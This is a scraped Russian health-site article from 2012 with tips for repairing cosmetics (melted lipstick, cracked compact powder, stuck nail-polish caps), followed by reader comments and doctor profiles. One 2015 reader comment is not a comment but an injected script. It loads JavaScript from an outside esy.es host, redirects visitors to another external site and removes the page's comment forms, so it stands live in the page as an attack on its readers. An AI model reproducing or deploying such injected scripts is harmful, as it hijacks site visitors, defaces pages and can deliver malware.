Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Декоративная косметика. К...  >>  Декоративная косметика. Как ее починить?
 
Обратная связь
 

Декоративная косметика. Как ее починить?

Размер шрифта
27 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Наша косметика иногда нуждается в ремонте. Можно ли «вернуть к жизни» любимую помаду или лак для ногтей и, главное, как это сделать? В этой статье - мастер-класс по ремонту косметики.

1

Возвращаем форму подтаявшей помаде

Чаще всего помады портятся из-за того, что начинают таять и терять свою форму, либо просто ломаются. Если цвет помады очень идет к лицу, то выбросить такую помаду жалко. Но мы часто не догадываемся, что ее можно восстановить.

Если помада начала таять, но еще не потеряла свою форму, поставьте ее в холодильник на 20 минут. Этого будет достаточно, чтобы она приобрела прежний вид. Но если она уже потеряла форму – срежьте верхушку ножом…

1

… и аккуратно кисточкой придайте столбику помады форму. После чего поставить в холодильник.

Если помада сломалась

1

Если помада треснула или сломалась, нужно аккуратно собрать ее и с помощью горячего воздуха из фена нагреть. После чего затереть шов кисточкой.

Восстанавливаем компактную пудру

Компактная пудра обычно хрупкая и легко трескается или крошится.

Для восстановления нам понадобится несколько капель спирта и маленький нож, чтобы ее разгладить. Важно дать пудре время просохнуть перед использованием.

1

Если компактная пудра была сильно повреждена, лучше разбить ее на мелкие кусочки и сделать из нее рассыпчатую пудру.

Открываем флакон с лаком для ногтей

Лак прилипает не только к ногтям, но и к стеклу. Проблема в том, что лак обычно засыхает на горлышке баночки и становится практически клеем. Как открыть баночку с лаком, если лак немного присох и крышка не откручивается?

1

Для того, чтобы открыть баночку с лаком, подставьте ее под струю с горячей водой, а потом обвернув в полотенце попробуйте открыть.
 

 

Сюжеты по теме:
Освежаем краски. Самостоятельно чиним косметику 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - helena

27 февраля 2012 в 13:15

Цитировать   |   Пожаловаться

Чтобы к флакону с лаком не присыхала крышка, резьбу надо смазать жирным кремом, никогда не присохнет!
А греть помаду не безопасно: срок годности ее сокращается и очень сильно (срок годности устанавливается для использования при комнатной температуре, нагрев ускоряет окислительные процессы, приводящие к порче продукта).

helena 27 февраля 2012 в 13:15
резьбу надо смазать жирным кремом, никогда не присохнет!
 Спасибо за внимание к нашим материалам и ценное уточнение! 

3 - zzzzzz

30 июня 2015 в 23:53

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.